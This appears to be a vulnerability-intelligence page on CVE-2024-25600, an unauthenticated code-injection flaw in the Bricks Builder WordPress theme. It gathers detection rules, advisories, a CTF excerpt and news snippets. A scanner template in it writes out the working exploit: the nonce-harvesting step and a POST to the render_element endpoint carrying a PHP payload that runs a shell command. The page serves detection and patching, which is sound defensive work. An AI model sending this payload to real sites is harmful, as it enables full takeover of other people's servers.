CVE-2024-25600
published 2024-06-04CVE-2024-25600: Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks…
PriorityP195critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
87.45%
99.7th percentile
Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codeer_limited | bricks_builder | n/a – 1.9.6 | — |
Detection & IOCsextracted from sources · hover to see the quote
path/wp-content/themes/bricks/
commandob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt"; flow:established,to_server; http.request_line; content:"POST|20 2f|wp|2d|json|2f|bricks|2f|v1|2f|render|5f|element|20|"; fast_pattern; http.request_body; content:"postId"; content:"nonce"; content:"useQueryEditor"; content:"queryEditor"; reference:url,github.com/Chocapikk/CVE-2024-25600/; reference:cve,2024-25600; classtype:misc-attack; sid:2051020; rev:2; metadata:affected_product Wordpress_Plugins, attack_target Client_Endpoint, tls_state TLSEncrypt, created_at 2024_02_21, cve CVE_2024_25600, deployment Perimeter, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Wordpress, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_02_22, reviewed_at 2024_11_06;)
yara
id: CVE-2024-25600
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"postId": "1","nonce": "{{nonce}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);","objectType": "post"}}}}
matchers:
- type: regex
regex:
- "Exception:"
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"- →The exploit requires a two-step process: first retrieve the nonce from the homepage JSON block (var bricksData), then POST to /wp-json/bricks/v1/render_element with the nonce and a malicious queryEditor payload. ↗
- →The exploit payload is delivered as a JSON POST body containing the fields: postId, nonce, element.name, element.settings.hasLoop, element.settings.query.useQueryEditor, and element.settings.query.queryEditor. Detection should look for all four body keywords together.
- →Post-exploitation activity includes disabling security plugins such as Wordfence and Sucuri — monitor for unexpected deactivation of these plugins after exploitation. ↗
- →The Nuclei template extracts the nonce via regex 'nonce":"([0-9a-z]+)' from the homepage body — use this pattern to identify nonce-harvesting reconnaissance requests in web logs.
- ·The Snort/ET rule requires TLS decryption (SSLDecrypt deployment) to inspect the POST body, as the exploit typically occurs over HTTPS.
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4rxr-g7cg-rwg8: Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection
ghsa_unreviewed·2024-06-04
CVE-2024-25600 [CRITICAL] CWE-94 GHSA-4rxr-g7cg-rwg8: Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection
Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6.
VulnCheck
Bricks Builder Theme unauthenticated RCE in prepare_query_vars_from_settings
vulncheck·2024·CVSS 10.0
CVE-2024-25600 [CRITICAL] Bricks Builder Theme unauthenticated RCE in prepare_query_vars_from_settings
Bricks Builder Theme unauthenticated RCE in prepare_query_vars_from_settings
Remote Code Execution vulnerability in Bricks Builder Theme prepare_query_vars_from_settings function
Affected: Bricks Builder Theme Bricks Builder Theme
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme/; https://patchstack.com/articles/new-year-new-threats-q1-2025s-most-exploited-wordpress-vulnerabilities/; https://app.crowdsec.net/cti/cve-explorer/CVE-2024-25600; https://www.loginsoft.com/reports/annually/vulnerability-intelligence-report-2025; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=C
Suricata
ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt
suricata·2024-02-21·CVSS 10.0
CVE-2024-25600 [CRITICAL] ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt
ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt"; flow:established,to_server; http.request_line; content:"POST|20 2f|wp|2d|json|2f|bricks|2f|v1|2f|render|5f|element|20|"; fast_pattern; http.request_body; content:"postId"; content:"nonce"; content:"useQueryEditor"; content:"queryEditor"; reference:url,github.com/Chocapikk/CVE-2024-25600/; reference:cve,2024-25600; classtype:misc-attack; sid:2051020; rev:2; metadata:affected_product Wordpress_Plugins, attack_target Client_Endpoint, tls_state TLSEncrypt, created_at 2024_02_21, cve CVE_2024_25600, deployment Perimeter, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Wordpress, tag Description_Generated_
Metasploit
Unauthenticated RCE in Bricks Builder Theme
metasploit
Unauthenticated RCE in Bricks Builder Theme
Unauthenticated RCE in Bricks Builder Theme
This module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval() function usage within the theme. Successful exploitation allows for full control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.
Nuclei
Unauthenticated Remote Code Execution – Bricks <= 1.9.6
nuclei·CVSS 10.0
CVE-2024-25600 [CRITICAL] Unauthenticated Remote Code Execution – Bricks <= 1.9.6
Unauthenticated Remote Code Execution – Bricks <= 1.9.6
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
Template:
id: CVE-2024-25600
info:
name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
author: christbowel
severity: critical
description: |
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building Wor
CTF
tryhackme-rooms / tryhack3mbricksheist
ctf_writeups·CVSS 10.0
CVE-2024-25600 [CRITICAL] tryhackme-rooms / tryhack3mbricksheist
# TryHack3M: Bricks Heist
https://tryhackme.com/r/room/tryhack3mbricksheist
Part of the 3mil challenge, rated Easy
This walkthrough won't cover the whole room, just the first portion where you are exploiting a CVE. I wanted to show how to do it without python.
The CVE is CVE-2024-25600, an unauthenticated remote code execution vuln in the bricks wordpress theme, pretty nasty stuff. There is an excellent public exploit for this here, written in Python: https://github.com/Chocapikk/CVE-2024-25600
I personally hate python because of its dependency hell nonsense. Here in particular as I was using the THM attack box which doesn't have python 3.10+ required for the above, I couldn't just clone and use the exploit.
However! It is trivial to exploit this vulnerability by hand! There are only
Greynoiseio
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
blogs_greynoiseio·2025-02-26·CVSS 9.8
[CRITICAL] GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Qualys
Defense Lessons From the Black Basta Ransomware Playbook
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook
## Table of Contents
Know Your Enemys Playbook
Attackers Move Fast
How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against evolving
Qualys
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
#### Table of Contents
- Know Your Enemys Playbook
- Attackers Move Fast
- How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against ev
Bleepingcomputer
Hackers exploit critical RCE flaw in Bricks WordPress site builder
blogs_bleepingcomputer·2024-02-19·CVSS 10.0
[CRITICAL] Hackers exploit critical RCE flaw in Bricks WordPress site builder
## Hackers exploit critical RCE flaw in Bricks WordPress site builder
## Bill Toulas
Hackers are actively exploiting a critical remote code execution (RCE) flaw impacting the Brick Builder Theme to run malicious PHP code on vulnerable sites.
The Bricks Builder Theme is a premium WordPress theme described as an innovative, community-driven visual site builder. With around 25,000 active installations, the product promotes user friendliness and customization in website design.
On February 10, a researcher named ‘snicco’ discovered a vulnerability currently tracked as CVE-2024-25600 that impacts the Brick Builder Theme installed with its default configuration.
The security issue is due to an eval function call in the ‘prepare_query_vars_from_settings’ function, which could allow an unauth
https://github.com/Chocapikk/CVE-2024-25600https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIThttps://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme?_s_id=cvehttps://patchstack.com/database/vulnerability/bricks/wordpress-bricks-theme-1-9-6-unauthenticated-remote-code-execution-rce-vulnerability?_s_id=cvehttps://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6https://github.com/Chocapikk/CVE-2024-25600https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIThttps://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme?_s_id=cvehttps://patchstack.com/database/vulnerability/bricks/wordpress-bricks-theme-1-9-6-unauthenticated-remote-code-execution-rce-vulnerability?_s_id=cvehttps://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
2024-06-04
Published
Exploited in the wild